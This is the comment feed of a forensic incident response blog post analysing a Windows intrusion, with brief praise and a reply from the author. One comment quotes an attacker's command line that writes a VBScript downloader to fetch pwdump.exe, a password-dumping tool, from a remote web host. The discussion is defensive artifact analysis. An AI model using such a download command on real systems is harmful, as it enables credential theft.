tag:blogger.com,1999:blog-6447283518071683105.post5890740126319811200..comments2023-04-02T10:17:04.631-04:00Comments on Forensic Incident Response: Analyzing an intrusion Part II - Corporal and Environmentalhogflyhttp://www.blogger.com/profile/00741773109962883616noreply@blogger.comBlogger3125tag:blogger.com,1999:blog-6447283518071683105.post-34959812686620459522007-04-30T00:17:00.000-04:002007-04-30T00:17:00.000-04:00Excellent Research! please keep writtingExcellent Research! please keep writtingAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-6447283518071683105.post-9406747390870197502007-04-29T15:24:00.000-04:002007-04-29T15:24:00.000-04:00Harlan,Thanks for the link. I'd already known tha...Harlan,<BR/>Thanks for the link. I'd already known that the file would exist in temporary internet files - and hinted at it(I was saving that for the next entry), but Robert's write up was definitely a good find! <BR/>Thanks for pointing me to it.hogflyhttps://www.blogger.com/profile/00741773109962883616noreply@blogger.comtag:blogger.com,1999:blog-6447283518071683105.post-55467459075464056812007-04-29T07:29:00.000-04:002007-04-29T07:29:00.000-04:00echo xPost.Open "GET","http://www.dit.net/images/p...<I>echo xPost.Open "GET","http://www.dit.net/images/pwdump.exe",0 >>get.vbs</I><BR/><BR/>One thing to point out here regarding artifacts...<BR/><BR/>Robert Hensing has a <A HREF="http://blogs.technet.com/robert_hensing/archive/2006/11/15/ever-found-malware-hiding-in-the-all-users-profile-on-windows-ever-wonder-how-it-got-there-or-why-it-was-there.aspx" REL="nofollow">great write-up</A> on what H. Carveyhttps://www.blogger.com/profile/08966595734678290320noreply@blogger.com